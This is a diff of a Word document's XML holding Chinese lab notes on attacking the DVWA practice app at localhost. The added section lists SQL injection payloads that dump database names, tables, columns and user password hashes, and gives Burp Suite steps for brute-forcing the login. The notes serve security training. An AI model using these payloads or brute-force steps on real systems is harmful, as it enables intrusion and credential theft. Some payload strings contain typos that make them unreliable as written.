--- a/screenshots/Problem_Summary&Fix.md.docx
+++ b/screenshots/Problem_Summary&Fix.md.docx
@@ -5,6 +5,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -20,6 +21,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -35,6 +37,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -53,6 +56,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="11"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>系统软件源更新命令</w:t>
@@ -106,6 +112,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="11"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>常用工具安装命令</w:t>
@@ -176,6 +185,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="11"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>网络连通性测试命令</w:t>
@@ -185,6 +197,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -216,6 +229,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -234,6 +248,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="12"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>DVWA靶场：Apache、MySQL服务启停+配置命令</w:t>
@@ -271,6 +288,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -303,6 +321,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -351,6 +370,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -385,6 +405,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -434,6 +455,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -452,6 +476,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -468,6 +493,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -516,6 +542,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -528,6 +557,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -560,6 +590,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -626,6 +657,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -675,6 +707,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -687,6 +722,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -720,6 +756,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -786,6 +825,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="12"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -828,6 +870,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -844,6 +887,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -892,6 +936,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -904,6 +951,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -923,6 +971,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1000,6 +1049,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1031,6 +1083,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="12"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP </w:t>
@@ -1047,6 +1102,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1059,6 +1117,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1090,6 +1149,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1116,6 +1178,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1132,6 +1195,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1192,6 +1256,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1223,6 +1290,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1302,6 +1370,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1317,6 +1386,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1342,6 +1412,435 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>输入“1’”（证明存在字符型注入漏洞）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>输入“1 or 1=1 -- ”（注入成功返回所有用户信息）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>输入</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>“1' union select database(),version() -- ”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>获取当前数据库名称和数据库版本</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>输入“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> union select 1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>group_concat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">),from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>information_schema_tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">where </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>table_schema</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">=database() -- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>获取数据库数据表</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>输入</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>“1' union select 1,group_concat(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>column_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">),3 from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>information_schema.columns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> where </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>='users' -- ”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>（获取</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>表中字段）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>输入</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>“1' union select 1,user,password from users -- ”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>，获取所有用户的账号和加密密码</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>（注：这里获取到的密码一般为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>MD5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>的哈希值，可以自行用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>自带的工具或者网上直接找哈希值转换工具就可以获取到明文密码）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="13"/>
@@ -1350,6 +1849,162 @@
       <w:r>
         <w:t>DVWA（Medium级别）POST型注入Payload</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>主要是使用Burp Suite工具的方法</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Kali终端：</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>burpsuite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>（打开工具）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>127.0.0.1/DVWA/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>login.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>（使用Burp内部浏览器访问）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>在登录时使用Burp抓包获取数据，将“123”设为爆破对象，在Position中添加kali自带字典，爆破后找到Password字样，发现Response报文中</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>有“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Location: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>index.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>”则表示</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>密码破解</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>成功。</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1357,6 +2012,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="13"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1386,6 +2044,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1420,6 +2079,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="14"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1436,6 +2098,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="14"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>Burp Suite抓包后修改的注入参数代码</w:t>
@@ -1444,6 +2109,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1462,6 +2128,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="15"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>Kali自带密码破解工具（john）命令</w:t>
@@ -1473,6 +2142,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="15"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>数据库权限查看与修改命令</w:t>
@@ -1481,6 +2153,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1496,6 +2169,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1511,6 +2185,7 @@
     <w:p>
       <w:pPr>
